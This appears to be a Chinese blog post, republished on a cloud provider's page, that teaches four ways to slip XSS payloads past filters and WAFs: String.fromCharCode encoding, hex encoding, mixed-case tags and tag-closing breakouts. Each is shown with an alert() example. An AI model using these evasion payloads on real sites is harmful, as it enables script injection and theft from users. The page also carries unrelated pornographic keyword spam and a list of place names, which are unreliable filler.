中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

繞過XSS過濾規則

發布時間:2020-10-10 07:18:22 來源:網絡 閱讀:840 作者:屋脊之上 欄目:安全技術

相信大家在做***測試的時候都有過這樣的經歷,明明一個XSS的漏洞,但是卻有XSS過濾規則或者WAF保護導致我們不能成功利用,比如我們輸入<scirpt>alert("hi")</script>,會被轉換為<script>alert(>xss detected<)</script>,這樣的話我們的XSS就不生效了,下面就教大家幾種簡單的繞過XSS的方法:

1、繞過 magic_quotes_gpc

magic_quotes_gpc=ON是php中的安全設置,開啟后會把一些特殊字符進行輪換,比如'(單引號)轉換為\',"(雙引號)轉換為\" ,\轉換為\\

比如:<script>alert("xss");</script>會轉換為<script>alert(\"xss\");</script>,這樣我們的xss就不生效了。

針對開啟了magic_quotes_gpc的網站,我們可以通過javascript中的String.fromCharCode方法來繞過,我們可以把alert("XSS");轉換為

String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)那么我們的XSS語句就變成了

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script> 

String.fromCharCode()是javascript中的字符串方法,用來把ASCII轉換為字符串。

如何轉換ASCII碼呢?

我們可以使用 hackbar 來搞定,Firefox的擴展工具https://addons.mozilla.org/en-US/firefox/addon/hackbar/

繞過XSS過濾規則
繞過XSS過濾規則
最后使用<script>轉換后的放到這里</script>包含即可。
2、HEX編碼
我們可以對我們的語句進行hex編碼來繞過XSS規則。
比如:<script>alert("xss");</script> 可以轉換為:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
在線工具:
http://textmechanic.com/ASCII-Hex-Unicode-Base64-Converter.html
http://www.asciitohex.com/
3、改變大小寫
在測試過程中,我們可以改變測試語句的大小寫來繞過XSS規則
比如:<script>alert("xss");</script> 可以轉換為:
<ScRipt>ALeRt("XSS");</sCRipT>
4、關閉標簽
有時我們需要關閉標簽來使我們的XSS生效,如:
"><script>alert("Hi");</script>

 

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

金堂县| 山阳县| 盐津县| 周宁县| 习水县| 鹤壁市| 普格县| 遂平县| 监利县| 孙吴县| 固阳县| 绍兴市| 云南省| 铁岭县| 阿克苏市| 玉林市| 延吉市| 渝中区| 乌兰察布市| 莲花县| 怀集县| 宁蒗| 丽水市| 婺源县| 娄底市| 县级市| 元阳县| 绿春县| 开远市| 荆州市| 嵊州市| 白城市| 望奎县| 黄陵县| 封开县| 新建县| 永嘉县| 宽甸| 北海市| 永清县| 银川市|